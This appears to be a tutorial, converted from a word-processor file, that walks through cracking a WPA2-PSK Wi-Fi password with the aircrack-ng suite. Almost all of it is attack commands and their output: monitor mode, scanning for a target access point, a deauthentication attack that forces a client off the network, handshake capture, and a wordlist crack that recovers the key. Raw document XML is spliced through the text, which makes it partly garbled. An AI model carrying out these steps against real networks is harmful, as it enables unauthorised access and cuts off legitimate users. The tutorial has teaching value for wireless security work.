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Identify the name of the wireless interface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root@debian:~# iwconfig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  <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">      IEEE 802.11  Mode:Monitor  Frequency:2.452 GHz  Tx-Power=15 dBm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Retry short limit:7   RTS thr:off   Fragment thr:off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Power Management:off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enp0s25   no wireless extensions.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        no wireless extensions.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Clear wireless processes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root@debian:~# airmon-ng check kill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Killing these processes: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PID Name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1760 dhclient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Get broad wireless environment overview, identify target AP bssid and channel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root@debian:~# airodump-ng </w:t>
            </w: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CH  8 ][ Elapsed: 18 s ][ 2017-03-04 15:48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BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">01:02:03:04:05:06 </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> -25       10        0      0      </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ff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     54e. </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ff0000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">WPA2</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> CCMP   </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ff0000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PSK</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">  donthackmebro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Setup targeted capture, identify connected clients</w:t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root@debian:~# airodump-ng --bssid </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ff0000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">01:02:03:04:05:06</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> -c </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ff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 -w out </w:t>
            </w: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CH  6 ][ Elapsed: 54 s ][ 2017-03-04 15:55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PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID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-26 100      150      550    0   6  54e. WPA2 CCMP   PSK  donthackmebro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STATION            PWR   Rate    Lost    Frames  Probe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</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ff0000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">DE:AD:BE:EF:CA:FE</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">  -36    0e-24e  1780      621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 a second terminal, deauth a connected client (-a for AP MAC; -c for connected client MAC)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root@debian:~# aireplay-ng -0 1 -a </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ff0000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">01:02:03:04:05:06</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> -c </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ff0000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">DE:AD:BE:EF:CA:FE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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">wlan0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16:02:25  Waiting for beacon frame (BSSID: 01:02:03:04:05:06) on channel 6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16:02:25  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:CA:FE] [ 1|60 ACKs]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Wait for deauth’d client to reconnect, ensure WPA handshake is captured</w:t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 CH  6 ][ Elapsed: 9 mins ][ 2017-03-04 16:04 ][ </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ff0000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">WPA handshake: 01:02:03:04:05:06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PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID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-40   0      946     1352  182   6  54e. WPA2 CCMP   PSK  donthackmebro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BSSID              STATION            PWR   Rate    Lost    Frames  Probe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01:02:03:04:05:06  DE:AD:BE:EF:CA:FE  -37    0e-24e   234     1629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Stop capture (Ctrl + C), then attempt to crack WPA key</w:t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root@deb:~#aircrack-ng out-01.cap -w /usr/share/wordlists/metasploit/burnett_top_1024.txt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Opening out-01.cap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Read 100451 packets.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#  BSSID              ESSID                     Encryption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1  01:02:03:04:05:06  donthackmebro             WPA (1 handshake)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Choosing first network as target.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Opening out-01.cap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Reading packets, please wait...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Aircrack-ng 1.2 rc4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[00:00:00] 28/64 keys tested (1461.84 k/s)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Time left: 0 seconds                                      43.75%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        KEY FOUND! [ cocacola ]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